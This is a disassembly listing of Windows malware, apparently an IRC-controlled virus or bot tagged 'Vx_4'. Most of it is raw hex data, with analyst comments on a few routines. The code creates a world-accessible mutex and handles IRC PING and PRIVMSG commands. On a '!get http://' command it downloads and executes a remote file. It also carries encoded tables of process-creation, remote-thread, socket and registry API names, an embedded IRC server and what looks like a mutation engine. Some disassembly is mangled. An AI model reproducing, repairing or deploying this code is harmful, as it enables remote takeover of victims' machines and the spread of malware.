        dd 5000000Eh, 51565054h, 0FF535050h, 103E8A95h, 59C08500h
        dd 74FF0F74h, 858F0824h, 103F72h, 0FFFDB5E8h, 95FF53FFh
        dd 103E62h, 0C4818EEBh, 128h, 6295FF57h
        db 3Eh, 10h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31011255
; Common failure exit: CloseHandle(the handle the caller left on the stack),
; then leave through loc_310111C7.
loc_3101160B:                           ; CODE XREF: sub_31011255+1Fj ; sub_31011255+B2j ...
        call    dword ptr [ebp+103E62h] ; CloseHandle
        jmp     loc_310111C7
; END OF FUNCTION CHUNK FOR sub_31011255
; ---------------------------------------------------------------------------
        db 0
; =============== S U B R O U T I N E =======================================
; sub_31011617: leave a SECURITY_ATTRIBUTES + SECURITY_DESCRIPTOR pair on the
; caller's stack and return eax -> SECURITY_ATTRIBUTES.  It pops its return
; address first and jumps back, so the 8 pushed dwords stay below the
; caller's esp (sub_31011636 removes them with add esp, 20h).
;   SECURITY_DESCRIPTOR (5 dwords): 40001h = Revision 1, Sbz1 0,
;     Control 0004h = SE_DACL_PRESENT; Owner/Group/Sacl/Dacl = NULL.
;     A present-but-NULL DACL grants everyone full access to the object.
;   SECURITY_ATTRIBUTES (3 dwords): nLength 0Ch, lpSecurityDescriptor,
;     bInheritHandle 0.
sub_31011617 proc near ; CODE XREF: UPX2:loc_3101145Ap ; sub_31011636+2p
        pop     edx                     ; edx = return address
        push    0                       ; Dacl
        push    0                       ; Sacl
        push    0                       ; Group
        push    0                       ; Owner
        push    40001h                  ; Revision / Sbz1 / Control
        mov     eax, esp                ; eax -> SECURITY_DESCRIPTOR
        push    0                       ; bInheritHandle
        push    eax                     ; lpSecurityDescriptor
        push    0Ch                     ; nLength
        mov     eax, esp                ; eax -> SECURITY_ATTRIBUTES
        jmp     edx
sub_31011617 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0                     ; event name: [ebp+101559h] in sub_31011636 resolves here
        align 2
; =============== S U B R O U T I N E =======================================
; sub_31011636: CreateEventA(&sa, bManualReset = 0, bInitialState = 0,
; lpName = [ebp+101559h]) with the NULL-DACL attributes from sub_31011617.
; Out: eax = event handle or 0.  sub_31011255 treats a non-zero
; GetLastError() afterwards as "already running".
sub_31011636 proc near ; CODE XREF: sub_31011255+9p ; UPX2:loc_31012031p
        xor     ecx, ecx
        call    sub_31011617
        lea     edx, [ebp+101559h]      ; lpName ("Vx_4" above, by address)
        push    edx
        push    ecx                     ; bInitialState
        push    ecx                     ; bManualReset
        push    eax                     ; lpEventAttributes
        call    dword ptr [ebp+103E66h] ; CreateEventA (resolved at loc_31011239)
        add     esp, 20h                ; discard the 8 dwords left by sub_31011617
        retn
sub_31011636 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
        db 8Bh, 0FFh
        db 58h
        dd 28005858h, 73000033h, 0Eh, 2 dup(0)
        dd 0C0000000h, 29h
        db 3 dup(0)
; =============== S U B R O U
T I N E ======================================= sub_31011673 proc near ; CODE XREF: sub_31011255+7Cp ; UPX2:310113E9p ... push ecx push esi push ebx call dword ptr [ebp+103E6Eh] stosd pop ecx loc_3101167E: ; CODE XREF: sub_31011673+Ej lodsb test al, al jnz short loc_3101167E loop sub_31011673 retn sub_31011673 endp ; --------------------------------------------------------------------------- dw 958Dh dd 101985h, 0C695FF52h, 8900103Eh, 10428885h, 16E800h dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h dd 416575h, 6E95FF50h, 8900103Eh, 10428C85h, 425CC300h dd 4E657361h, 64656D61h, 656A624Fh, 5C737463h, 65537456h dd 6C007463h, 6C727473h, 43006E65h, 74616572h, 6C694665h dd 43004165h, 74616572h, 6C694665h, 70614D65h, 676E6970h dd 72430041h, 65746165h, 636F7250h, 41737365h, 65724300h dd 52657461h, 746F6D65h, 72685465h, 646165h, 61657243h dd 68546574h, 64616572h, 65724300h, 54657461h, 686C6F6Fh dd 33706C65h, 616E5332h, 6F687370h, 78450074h, 68547469h dd 64616572h, 6C694600h, 6D695465h, 536F5465h, 65747379h dd 6D69546Dh, 72460065h, 694C6565h, 72617262h, 65470079h dd 6C694674h, 74744165h, 75626972h, 41736574h, 74654700h dd 656C6946h, 657A6953h, 74654700h, 656C6946h, 656D6954h dd 74654700h, 75646F4Dh, 6148656Ch, 656C646Eh, 65470041h dd 6D655474h, 6C694670h, 6D614E65h, 47004165h, 65547465h dd 6150706Dh, 416874h, 56746547h, 69737265h, 47006E6Fh dd 65567465h, 6F697372h, 4178456Eh, 74654700h, 756C6F56h dd 6E49656Dh, 6D726F66h, 6F697461h, 4C00416Eh, 4C64616Fh dd 61726269h, 417972h, 5670614Dh, 4F776569h, 6C694666h dd 704F0065h, 69466E65h, 614D656Ch, 6E697070h, 4F004167h dd 506E6570h, 65636F72h, 50007373h, 65636F72h, 32337373h dd 73726946h, 72500074h, 7365636Fh, 4E323373h, 747865h dd 46746553h, 41656C69h, 69727474h, 65747562h, 53004173h dd 69467465h, 6954656Ch, 5300656Dh, 7065656Ch, 73795300h dd 546D6574h, 54656D69h, 6C69466Fh, 6D695465h, 6E550065h dd 5670616Dh, 4F776569h, 6C694666h, 69560065h, 61757472h dd 6C6C416Ch, 5700636Fh, 65746972h, 656C6946h, 41744E00h dd 
73756A64h, 69725074h, 656C6976h, 54736567h, 6E656B6Fh dd 43744E00h, 74616572h, 6C694665h, 744E0065h, 61657243h dd 72506574h, 7365636Fh, 744E0073h, 61657243h, 72506574h dd 7365636Fh, 784573h, 7243744Eh, 65746165h, 74636553h dd 6E6F69h, 7243744Eh, 65746165h, 72657355h, 636F7250h dd 737365h, 614D744Eh, 65695670h, 53664F77h, 69746365h dd 4E006E6Fh, 65704F74h, 6C69466Eh, 744E0065h, 6E65704Fh dd 636F7250h, 54737365h, 6E656B6Fh, 4F744E00h, 536E6570h dd 69746365h, 4E006E6Fh, 6F725074h, 74636574h, 74726956h dd 4D6C6175h, 726F6D65h, 744E0079h, 72657551h, 666E4979h dd 616D726Fh, 6E6F6974h, 656B6F54h, 744E006Eh, 74697257h dd 72695665h, 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h dd 646F6369h, 72745365h, 54676E69h, 736E416Fh, 72745369h dd 676E69h, 53415357h, 74726174h, 63007075h, 65736F6Ch dd 6B636F73h, 63007465h, 656E6E6Fh, 67007463h, 6F687465h dd 79627473h, 656D616Eh, 63657200h, 65730076h, 7300646Eh dd 656B636Fh, 6E490074h, 6E726574h, 6C437465h, 4865736Fh dd 6C646E61h, 6E490065h, 6E726574h, 65477465h, 6E6F4374h dd 7463656Eh, 74536465h, 657461h, 65746E49h, 74656E72h dd 6E65704Fh, 6E490041h, 6E726574h, 704F7465h, 72556E65h dd 4900416Ch, 7265746Eh, 5274656Eh, 46646165h, 656C69h dd 41564441h, 32334950h, 4C4C442Eh, 67655200h, 736F6C43h dd 79654B65h, 67655200h, 6E65704Fh, 4579654Bh, 52004178h dd 75516765h, 56797265h, 65756C61h, 417845h, 53676552h dd 61567465h, 4565756Ch, 56004178h, 26AF633h, 0D48B5656h dd 0FF52016Ah, 0FF561872h, 10428C95h, 56C48B00h, 56505656h dd 0FF1870FFh, 103EFA95h, 10C48300h, 8C25Eh, 2BFB498Dh dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h dd 8B50CC8Bh, 6A5450D4h, 53525140h, 3F2295FFh, 0C4830010h dd 2A95FF0Ch, 8300103Fh, 8DC308C4h, 103E3095h, 6AC93300h dd 30685200h, 8B003200h, 6A5151C4h, 6A515040h, 8C08318h dd 500E6A54h, 3F1E95FFh, 0C4830010h, 85D23320h, 0C2990FC0h dd 2358DAF7h, 3357C3C2h, 0FFC1E8FFh, 840FFFFFh, 0A5h, 73286850h dd 0D48B0000h, 0CC8B006Ah, 68406Ah, 6A001000h, 6A5202h dd 732868h, 51006A00h, 95FF5053h, 103F12h, 95FF595Fh, 103E62h dd 
7174FF85h, 15908D8Bh, 0CE30010h, 1000958Dh, 0D1030010h dd 0D2FF5357h, 3EFE858Bh, 8F8D0010h, 2916h, 0FFFF2BE8h dd 16858BFFh, 8D00103Fh, 29638Fh, 0FF1AE800h, 858BFFFFh dd 103F02h, 296A8F8Dh, 9E80000h, 8BFFFFFFh, 103F0685h dd 74C08500h, 778F8D20h, 0E8000029h, 0FFFFFEF4h, 3F0E858Bh dd 0C0850010h, 8F8D0B74h, 2984h, 0FFFEDFE8h, 5FC78BFFh dd 0E855C3h, 5D000000h, 1B24ED81h, 0C9330010h, 1EAF858Dh dd 54510010h, 51505151h, 8E95FF51h, 8700103Eh, 95FF2404h dd 103E62h, 4C25Dh, 0E855h, 815D0000h, 101B53EDh, 8DFF6A00h dd 101B1E95h, 0CD525000h, 2A002420h, 0CC48300h, 6485C766h dd 0CD00101Bh, 6685C720h, 2400101Bh, 5D002A00h, 581A6AC3h dd 9E8h, 61428D00h, 75C9FEAAh, 9569C3F0h, 103F7Ch, 8088405h dd 7C958942h, 0F700103Fh, 0E855C3E2h, 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101BADh mov ebx, [ebp+103F80h] cmp dword ptr [esp+8], 0 jz loc_31011D55 sub esp, 208h push esp push 104h call dword ptr [ebp+103EB6h] mov edi, esp lea eax, [esp+104h] push eax push 0 call near ptr loc_31011CC2+1 push esi push edx push edx loc_31011CC2: ; CODE XREF: UPX2:31011CBAp add [edi-1], dl xchg eax, ebp mov dl, 3Eh adc [eax], al xor ecx, ecx lea edx, [edi+104h] push ecx push ecx push 2 push ecx push 1 push 40000000h push edx call dword ptr [ebp+103E7Eh] xchg eax, esi test esi, esi jz short loc_31011D45 loc_31011CEA: ; CODE XREF: UPX2:31011D18j push eax push esp push 104h push edi push dword ptr [esp+220h] call dword ptr [ebp+103F5Eh] pop ecx test eax, eax jz short loc_31011D1A jecxz short loc_31011D1A push eax mov edx, esp push 0 push edx push ecx push edi push esi call dword ptr [ebp+103EF6h] pop ecx test eax, eax jnz short loc_31011CEA loc_31011D1A: ; CODE XREF: UPX2:31011D02j ; UPX2:31011D04j push esi call dword ptr [ebp+103E62h] lea edx, [edi+44h] push edx push edi push 44h pop eax lea edx, [edi+104h] stosd xor eax, eax push 10h pop ecx rep stosd push eax push eax push eax push eax push eax push eax push eax push edx call dword ptr [ebp+103E86h] 
loc_31011D45: ; CODE XREF: UPX2:31011CE8j add esp, 208h push dword ptr [esp+8] call dword ptr [ebp+103F4Eh] loc_31011D55: ; CODE XREF: UPX2:31011C96j push ebx call dword ptr [ebp+103F4Eh] pop ebp retn 4 ; --------------------------------------------------------------------------- cmp byte ptr [esi], 0Ah jnz short loc_31011D66 inc esi loc_31011D66: ; CODE XREF: UPX2:31011D63j mov ecx, [ebp+10158Ch] jecxz short loc_31011D87 lea edx, [ebp+101000h] add edx, ecx push esi call edx test al, al js loc_31011EA0 jz loc_31011E97 loc_31011D87: ; CODE XREF: UPX2:31011D6Cj cmp byte ptr [esi], 3Ah jnz short loc_31011D9C loc_31011D8C: ; CODE XREF: UPX2:31011D99j inc esi cmp byte ptr [esi], 0 jz loc_31011E97 cmp byte ptr [esi], 20h jnz short loc_31011D8C inc esi loc_31011D9C: ; CODE XREF: UPX2:31011D8Aj cmp dword ptr [esi], 474E4950h jnz short loc_31011DE6 mov ecx, edi mov byte ptr [esi+1], 4Fh sub ecx, esi push ecx push 0 push ecx push esi push ebx call dword ptr [ebp+103F46h] pop ecx cmp eax, ecx jnz loc_31011EA0 lea eax, [ebp+101EA3h] push 0 push 0Ch push eax push ebx call dword ptr [ebp+103F46h] cmp eax, 0Ch jnz loc_31011EA0 jmp loc_31011E97 ; --------------------------------------------------------------------------- loc_31011DE6: ; CODE XREF: UPX2:31011DA2j cmp dword ptr [esi], 56495250h jnz loc_31011E97 add esi, 8 loc_31011DF5: ; CODE XREF: UPX2:31011E00j lodsb cmp al, 0Dh jz loc_31011E97 cmp al, 20h jnz short loc_31011DF5 lodsb cmp al, 3Ah jnz loc_31011E97 lodsd or eax, 20202020h cmp eax, 74656721h jnz short loc_31011E97 lodsb cmp al, 20h jnz short loc_31011E99 cmp dword ptr [esi-1], 74746820h jnz short loc_31011E97 cmp dword ptr [esi+3], 2F2F3A70h jnz short loc_31011E97 mov byte ptr [edi-1], 0 rdtsc mov edx, 2710h mul edx push edx call dword ptr [ebp+103EE6h] xor eax, eax push eax push eax push eax push eax call near ptr loc_31011E55+2 inc esp outsd ja short loc_31011EC0 insb outsd popa loc_31011E55: ; CODE XREF: UPX2:31011E49p db 64h add bh, bh xchg eax, ebp push esi aas 
adc [eax], al test eax, eax jz short loc_31011E97 xor ecx, ecx mov [ebp+103F80h], eax push ecx push 80000200h push ecx push ecx push esi push eax call dword ptr [ebp+103F5Ah] lea edx, [ebp+101BA7h] push eax xor ecx, ecx push esp push ecx push eax push edx push ecx push ecx call dword ptr [ebp+103E8Eh] xchg eax, [esp] call dword ptr [ebp+103E62h] loc_31011E97: ; CODE XREF: UPX2:31011D81j ; UPX2:31011D90j ... clc retn ; --------------------------------------------------------------------------- loc_31011E99: ; CODE XREF: UPX2:31011E1Bj or byte ptr [ebp+10157Fh], 1 loc_31011EA0: ; CODE XREF: UPX2:31011D7Bj ; UPX2:31011DBBj ... stc retn ; --------------------------------------------------------------------------- push 1 push 1 push dword ptr [ebx] push dword ptr [ebx+4] call dword ptr ds:5A74C085h ; CODE XREF: UPX2:31012011p xor ebx, ebx mov edx, eax mov bl, 0Bh add edx, [eax+3Ch] lea esi, [ebp+101DCBh] loc_31011EC0: ; CODE XREF: UPX2:31011E50j mov edi, [edx+10Ch] mov ecx, [edx+108h] add edi, eax sub ecx, ebx loc_31011ED0: ; CODE XREF: UPX2:31011ED9j pusha mov ecx, ebx repe cmpsb popa jz short loc_31011EDD inc edi loop loc_31011ED0 jmp short locret_31011F0B ; --------------------------------------------------------------------------- loc_31011EDD: ; CODE XREF: UPX2:31011ED6j add edi, 0Fh push ebx mov ecx, esp push edi mov edx, esp push eax push esp push 40h push ecx push edx push 0FFFFFFFFh call dword ptr [ebp+103F22h] mov ecx, [ebp+103E96h] add esp, 0Ch sub ecx, edi sub ecx, 7 mov dword ptr [edi], 0E8006Ah mov [edi+3], ecx locret_31011F0B: ; CODE XREF: UPX2:31011EDBj retn ; --------------------------------------------------------------------------- aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0 aTargethost db 'TargetHost',0 dw 2 dd 72555000h, 7270D08Fh, 6D69786Fh, 6372692Eh, 616C6167h dd 702E7978h, 494E006Ch, 6F204B43h, 726D636Dh, 0A696376h dd 52455355h, 4F4A6320h, 26204E49h, 74726976h, 0E8550A75h dd 0 ; 
--------------------------------------------------------------------------- pop ebp sub ebp, 101EB5h mov byte ptr [ebp+10157Fh], 0 call dword ptr [ebp+103EBAh] shr eax, 1Fh jz short loc_31011FE1 push 1Eh mov esi, [ebp+103E72h] pop ecx loc_31011FAE: ; CODE XREF: UPX2:loc_31011FDDj lodsb cmp al, 2Eh jnz short loc_31011FDD cmp word ptr [esi], 1DFFh jnz short loc_31011FDD lea edi, [ebp+103F76h] mov esi, [esi+2] push edi movsd movsw lea eax, [ebp+1038ECh] pop dword ptr [ebp+103912h] cli mov [esi-6], eax mov word ptr [esi-2], cs sti mov cl, 1 loc_31011FDD: ; CODE XREF: UPX2:31011FB1j ; UPX2:31011FB8j loop loc_31011FAE jmp short loc_31012031 ; --------------------------------------------------------------------------- loc_31011FE1: ; CODE XREF: UPX2:31011FA3j call near ptr dword_31011688+47Fh cmp dword ptr [esp+8], 4 jnz short loc_31012031 call near ptr loc_31011FF9+1 push ebx inc esi inc ebx db 2Eh inc esp dec esp dec esp loc_31011FF9: ; CODE XREF: UPX2:31011FEDp add bh, bh xchg eax, ebp mov byte ptr [esi], 10h add [ebx], cl sal byte ptr [ebp+ecx-6Dh], 6Ah add dl, [ebx-1] xchg eax, ebp outsb db 3Eh adc [eax], al call eax xchg eax, ebx call near ptr loc_31011EAB+2 call near ptr loc_31012025+1 push ebx inc esi inc ebx pop edi dec edi push ebx db 2Eh inc esp dec esp dec esp loc_31012025: ; CODE XREF: UPX2:31012016p add bh, bh xchg eax, ebp mov byte ptr [esi], 10h add al, ch loc_3101202D: ; CODE XREF: UPX2:loc_3101202Dj jl short loc_3101202D ; --------------------------------------------------------------------------- db 0FFh db 0FFh ; --------------------------------------------------------------------------- loc_31012031: ; CODE XREF: UPX2:31011FDFj ; UPX2:31011FEBj call sub_31011636 dec dword ptr [ebp+1012D4h] xor ecx, ecx lea eax, [ebp+104324h] push ecx push ecx push ecx push ecx push eax push ecx push ecx push ecx call dword ptr [ebp+103EC2h] call near ptr loc_31012061+1 push ebp push ebx inc ebp push edx xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_31012061: ; 
CODE XREF: UPX2:31012052p add bh, bh xchg eax, ebp mov byte ptr [esi], 10h add al, ch or al, [eax] ; --------------------------------------------------------------------------- db 0 dd 70737700h, 746E6972h, 50004166h, 3E6E95FFh, 85890010h dd 103E76h, 8D8D310Fh, 101985h, 3F7C8589h, 0FF510010h dd 103EC695h, 4689300h, 8D000000h, 101992B5h, 0BD8D5900h dd 103F62h, 0FFF5C2E8h, 85C766FFh, 101E75h, 0A5835000h dd 101E77h, 35958D00h, 5000101Eh, 6A016A54h, 2685200h dd 0FF800000h, 103F6695h, 5AC08500h, 8D8D2275h, 101E68h dd 8D066A52h, 101E75B5h, 50565400h, 0FF525150h, 103F6A95h dd 95FF5800h, 103F62h, 418385C6h, 0E8000010h, 0Ch, 434F5357h dd 2E32334Bh, 4C4C44h, 3EC695FFh, 68930010h, 7, 18E9B58Dh dd 8D590010h, 103F32BDh, 0F53DE800h, 0CE8FFFFh, 57000000h dd 4E494E49h, 442E5445h, 0FF004C4Ch, 103EC695h, 0FC08500h dd 23584h, 5689300h, 8D000000h, 101927B5h, 0BD8D5900h dd 103F4Eh, 0FFF506E8h, 52BD83FFh, 103Fh, 210840Fh, 0EC810000h dd 190h, 1016854h, 95FF0000h, 103F32h, 190C481h, 8B500000h dd 52006AD4h, 3F5295FFh, 0C0850010h, 680D7559h, 1388h dd 3EE695FFh, 0E2EB0010h, 1E77BD83h, 75000010h, 7B858D29h dd 5000101Eh, 3F3E95FFh, 0C0850010h, 189840Fh, 408B0000h dd 0FF008B0Ch, 77858F30h, 0C600101Eh, 10418385h, 6A0100h dd 26A016Ah, 3F4A95FFh, 0F8830010h, 60840FFFh, 93000001h dd 1E73958Dh, 106A0010h, 95FF5352h, 103F3Ah, 850FC085h dd 140h, 1E94BD8Dh, 8B10010h, 0FFFA3CE8h, 9468FFh, 2B5E0000h dd 243489E6h, 0BE95FF54h, 8D00103Eh, 101EA2BDh, 0E801B100h dd 0FFFFFA1Dh, 1E8F958Dh, 6A0010h, 1468h, 0FF535200h, 103F4695h dd 24448D00h, 24958D14h, 50001043h, 8B0AB60Fh, 0C1142444h dd 4A0208E0h, 24A1201h, 0B034A12h, 80082444h, 0E0C10FE1h dd 440B5108h, 32FF1024h, 84BD8D50h, 0E800103Fh, 1Ch, 78362E25h dd 2E202E20h, 25253A20h, 78382E25h, 25207825h, 4F4A0A73h dd 204E49h, 7695FF57h, 8100103Eh, 0ACC4h, 50006A00h, 95FF5357h dd 103F46h, 15988D8Bh, 6A0010h, 0C96B1BE3h, 5E8510Dh, 26000000h dd 0A6425h, 7695FF57h, 8300103Eh, 0EB500CC4h, 7680Bh, 0BD8D0000h dd 101EA8h, 95FF5357h, 103F46h, 547EC085h, 3F84B58Dh, 0A5830010h 
dd 101598h, 838D8D00h, 2B001041h, 51006ACEh, 95FF5356h dd 103F42h, 7E00F883h, 0FE8B912Fh, 3F84B58Dh, 0DB00010h dd 1075AEF2h, 0FA2AE860h, 7261FFFFh, 8D09E317h, 0EAEB0177h dd 0CE2BCF8Bh, 3F84BD8Dh, 0A4F30010h, 0B9EBF787h, 3695FF53h dd 8000103Fh, 10157FBDh, 2A740100h, 753068h, 0E695FF00h dd 8000103Eh, 104183BDh, 11740000h, 1E7785C7h, 10h, 85C60000h dd 104183h, 0FE08E900h, 85C7FFFFh, 101588h, 80000000h dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h dd 21656D69h, 27744920h, 616C2073h, 0A8216574h, 294CA2A1h dd 4810A614h, 32403752h, 0E5403752h, 9427B1FAh, 0B986E151h dd 88658000h, 528F9087h, 5CD8B8B3h, 8FC26CCCh, 0C76898h dd 14h dup(0) dd 60000000h, 42F4A583h, 83000010h, 1042F8A5h, 0B70F0000h ; CODE XREF: UPX2:31013077p ; UPX2:310130B4p ... 
dd 538D1443h, 4BB70F18h, 8BD00306h, 2B242444h, 19720C42h dd 7308423Bh, 14428B14h, 890C422Bh, 1042F495h, 0F8858900h dd 0EB001042h, 28C28305h, 0C261D9E2h, 85880004h, 102467h dd 64E8h, 206800h, 858D0000h, 102394h, 74183959h, 4C0830Ch dd 85FFF7E2h, 1042D0h, 3D9F7C3h, 1024678Dh, 0FF10E300h dd 8FFC70h, 0E204E883h, 949D89F6h, 83001023h, 574003Ah dd 7203322Bh, 0FC4E8D10h, 835E5B58h, 474003Ah, 3EB32FFh dd 0E81072FFh, 0FFFFFF57h, 8D2BCE2Bh, 1042F8h, 344B0358h dd 0D4858FC3h, 0C7001042h, 1042D085h, 0 dd 3CE800h, 858B0000h, 1042D0h, 0FFF6A9E8h, 18E8FFh, 0BD830000h dd 1042D0h, 89087500h, 1024109Dh, 0FF9CEB00h, 1042D08Dh dd 858FC300h, 1042D4h, 42D09589h, 3E80010h, 33000000h dd 938BC3C9h, 80h, 0FEEDE852h, 9503FFFFh, 1042F8h, 7A83D603h dd 840F000Ch, 107h, 107A83h, 0FD840Fh, 428B0000h, 0C8E8500Ch dd 3FFFFFEh, 1042F885h, 50C60300h, 0F980088Ah, 80197400h dd 3742EF9h, 8BF1EB40h, 0E1810148h, 0DFDFDFDFh, 4C44F981h dd 0EC75004Ch, 83C82B59h, 8F0FFAF9h, 0B7h, 0FE788166h dd 850F3233h, 0ABh, 3A8356h, 4A8B0575h, 8B02EB10h, 51F1030Ah dd 0FFFE72E8h, 0F8B503FFh, 0AD001042h, 0FB78C085h, 84840Fh dd 0B5FF0000h, 1042F8h, 0FE55E850h, 8503FFFFh, 1042F8h dd 42F8858Fh, 4030010h, 0C0835324h, 0FDB3302h, 12E308B6h dd 5320C980h, 42424C1h, 29241C29h, 405B240Ch, 0FB81E9EBh dd 0DDBBD70Fh, 0FB813E74h, 0DB6E45A8h, 0FB813674h, 0FFA13B59h dd 0FB812E74h, 0ACB522D6h, 0FB812674h, 0F358E993h, 0FB811E74h dd 0F358E97Dh, 0FB811674h, 0E1253F46h, 0FB810E74h, 0E1253F30h dd 95FF0674h, 1042D4h, 0FF71E95Bh, 835EFFFFh, 0EFE914C2h dd 0C3FFFFFEh, 58046A01h, 0FFF549E8h, 419588FFh, 66001026h dd 21831B8h, 3E4C0E2h, 0AB66E202h, 0E858066Ah, 0FFFFF52Eh dd 8708C283h, 58056AD1h, 0FFF521E8h, 3FA80FFh, 50B00B73h dd 26418502h, 0EBAA0010h, 58686A27h, 3FA80AAh, 11B01875h dd 0FFF501E8h, 1B8FFh, 0D2840000h, 0E0D10D74h, 0F6EBCAFEh dd 0B805EBh, 0AB800000h, 8DC3BFE2h, 1039CC95h, 0F7D72B00h dd 85F7C3DAh, 1039C0h, 10000000h, 0C1C0950Fh, 85F60BE0h dd 1039BEh, 66067501h, 0EB25890Dh, 0BE85F613h, 2001039h dd 0D660675h, 4EB2531h, 25010D66h, 0BCE8AB66h, 
8BFFFFFFh dd 95893443h, 1042E8h, 85F7C3ABh, 1039C0h, 10000000h, 4C0950Fh dd 9CE8AABCh, 89FFFFFFh, 1042EC95h, 0BE85F600h, 1001039h dd 310F0475h, 0C02B02EBh, 85F7C3ABh, 1039C0h, 10000000h dd 858A2774h, 1039BAh, 660BE0C1h, 66458B0Dh, 0AAF8B0ABh dd 39BA858Ah, 0E0C10010h, 6467051Bh, 33AB0689h, 0EBAB66C0h dd 8F64B812h, 8AAB0005h, 1039BA85h, 0C1580400h, 0C3AB18E0h dd 279C85C6h, 0EB090010h, 0EBFCB025h, 0EBB86620h, 0EBAB6600h dd 58046A19h, 0FFF409E8h, 0D2048DFFh, 6608E0C1h, 66C08905h dd 0B003EBABh, 276AAA90h, 0F3F0E858h, 8580FFFFh, 10279Ch dd 8FA8006h, 0D2842F73h, 2 dup(0CAFEC374h), 0CAFEC774h dd 0CAFED974h, 0CAFE0C74h, 0CAFE0F74h, 0F9B00F74h, 87B0CBEBh dd 0EBDBB0AAh, 0EBF5B0C4h, 0EBF8B0C0h, 85F7C3BCh, 1039C0h dd 2000h, 27586B0h, 4F8D0404h, 0B8A58AFEh, 66001039h, 5FC80ABh dd 0B00775h, 40FF4F80h, 0FF62E8AAh, 85F7FFFFh, 1039C0h dd 4000h, 3166B866h, 29B40275h, 18B0AB66h, 39BA850Ah, 0E0C00010h dd 3DE8AA03h, 0B0FFFFFFh, 0C085F788h, 1039h, 75000080h dd 8A86B002h, 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h dd 0C3AA40FFh, 39CCBD8Dh, 0DE80010h, 0F7FFFFFFh, 1039C085h dd 40000000h, 0B0037400h, 85F7AA60h, 1039C0h, 10000000h db 74h, 7, 0B8h ; --------------------------------------------------------------------------- push ebp mov ebp, esp add [ebx-3F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- dd 0F020000h, 0F084h, 0AAE8B000h, 0D8BD89ABh, 0E8001042h dd 0FFFFFECCh, 0ABAAE8B0h, 42DCBD89h, 0BDE80010h, 0F7FFFFFEh dd 1039C085h, 300h, 0F71A7400h, 1039C085h, 0 dd 0E80A7402h, 0FFFFFE2Eh, 0FFFE9BE8h, 0AAE9B0FFh, 0D8858BABh dd 8B001042h, 89C82BCFh, 1042E0BDh, 0FC488900h, 0FF6467B8h dd 0C033AB36h, 85F7AB66h, 1039C0h, 3, 85F61374h, 1039BEh dd 0E80A7480h, 0FFFFFDAAh, 0FFFE5BE8h, 6467B8FFh, 33AB2689h dd 0F7AB66C0h, 1039C085h, 300h, 0F65A7400h, 1039BE85h dd 0A758000h, 0FFFD81E8h, 0FE32E8FFh, 2E8FFFFh, 0B0FFFFFDh dd 0FB14E820h, 39E3FFFFh, 15FFB866h, 0AB91AB66h, 39C0958Bh dd 0D2F70010h, 3C2F7h, 14750000h, 0FFFCDCE8h, 0E81FB0FFh dd 
0FFFFFAEEh, 15FFB866h, 0AB91AB66h, 858BCF8Bh, 1042E0h dd 4889C82Bh, 0C085F7FCh, 3001039h, 74000000h, 0C085F738h dd 1039h, 740C0000h, 0C085F72Ch, 1039h, 75020000h, 0FDC2E80Ah dd 4BE8FFFFh, 0F7FFFFFDh, 1039C085h, 0 dd 0E80A7408h, 0FFFFFDACh, 0FFFD61E8h, 0C085F7FFh, 4001039h dd 74000000h, 0FD96E817h, 29B8FFFFh, 0ABC8FEC0h, 74C008B8h dd 75B8AB04h, 0AB67EBF8h, 0FFFD7FE8h, 0C085F7FFh, 8001039h dd 75000000h, 0BEBD8072h, 1039h, 65E86974h, 0B8FFFFFDh dd 0C9291829h, 39BAA50Ah, 0E4C00010h, 0BAA50A03h, 0AB001039h dd 0FFFD4BE8h, 0AAB1B0FFh, 39BE858Ah, 0E8AA0010h, 0FFFFFD3Ch dd 0BA85B60Fh, 8D001039h, 4004C004h, 0B008E0C1h, 0B0AB668Dh dd 0E857AA01h, 0FFFFFD20h, 66243C29h, 59FBE2B8h, 39C085F7h dd 100010h, 7740000h, 66AA49B0h, 2FA75B8h, 0E8AB66E1h dd 0FFFFFCFCh, 33AAE8B0h, 0BD89ABC0h, 1042C4h, 39C085F7h dd 200010h, 3B750000h, 0FCDEE857h, 85F7FFFFh, 1039C0h dd 80000000h, 0BD891874h, 1042F0h, 0FFFD39E8h, 0FCC2E8FFh dd 0C3B0FFFFh, 0FCBAE8AAh, 8B5AFFFFh, 2B58B0CFh, 0B8850ACAh dd 89001039h, 0E8AAFC4Ah, 0FFFFFCA4h, 0C081B866h, 39C085F7h dd 400010h, 3740000h, 0A28C480h, 1039B8A5h, 89AB6600h dd 1042C8BDh, 85F7AB00h, 1039C0h, 40000000h, 50B00975h dd 39B88502h, 0F7AA0010h, 1039C085h, 8000h, 0B00B7500h dd 0B9850AB8h, 0AA001039h, 0B8663DEBh, 85F71831h, 1039C0h dd 100h, 29B00274h, 39B9A50Ah, 0E4C00010h, 0B9A50A03h dd 66001039h, 81B866ABh, 0C085F7F0h, 1039h, 75000002h dd 0AC8B402h, 1039B9A5h, 89AB6600h, 1042E4BDh, 29CCB800h dd 0F7AB0000h, 1039C085h, 800h, 0E8717400h, 0FFFFFBFCh dd 39C085F7h, 4000010h, 0B750000h, 850AB8B0h, 1039BAh dd 0F74DEBAAh, 1039C085h, 80000h, 66117500h, 0AE083B8h dd 1039BAA5h, 33AB6600h, 15EBAAC0h, 1829B866h, 